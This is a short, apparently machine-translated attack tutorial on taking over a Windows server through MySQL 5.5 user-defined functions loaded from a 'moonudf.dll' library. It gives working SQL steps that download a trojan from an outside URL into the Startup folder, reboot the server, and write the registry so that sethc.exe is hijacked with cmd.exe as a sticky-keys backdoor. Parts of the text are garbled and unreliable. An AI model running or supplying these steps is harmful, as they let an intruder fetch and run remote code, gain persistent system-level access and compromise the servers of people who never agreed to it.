MYSQL5.5 Privilege Escalation solution when the shell cannot be executed

If MYSQL5.5 does not have the permission to access the LIB directory, you can create a new one. In this post, you can export the DLL normally,

 

However, an error occurred while executing mongoshell. Here we have two methods to consider:

1. Use the downloader function to download a trojan or script to the startup Item.

Create Function downloader returns string soname 'moonudf. dll ';

Select downloader ("http://www.admin163.net/xx.exe", "C: \ Documents and Settings \ All Users \ Start Menu \ Program \ Start \ a.exe ");

Then use the SHUT function to restart the server.

Create function shut returns string soname 'moonudf. dll'

Select shut ('reboot ');

However, in this SHELL, you cannot download to the startup Item and do not have the permission.

2. Use regwrite and regread.exe to hijack sethc.exe

. Create Function regread returns string soname 'moonudf. dll ';

 

Select regread ("HKEY_LOCAL_MACHINE", "SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ sethc.exe", "debugger ")

 

We can see that it has been hijacked. We re-write it to the Registry and first upload our CMD. EXE

 

Use regwrite to write data to www.2cto.com

① Create Function regwrite returns string soname 'moonudf. dll ';

② Select regwrite ("HKEY_LOCAL_MACHINE", "SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ sethc.exe", "debugger", "REG_SZ", "C: \ tmp \ cmd.exe ");

Login Server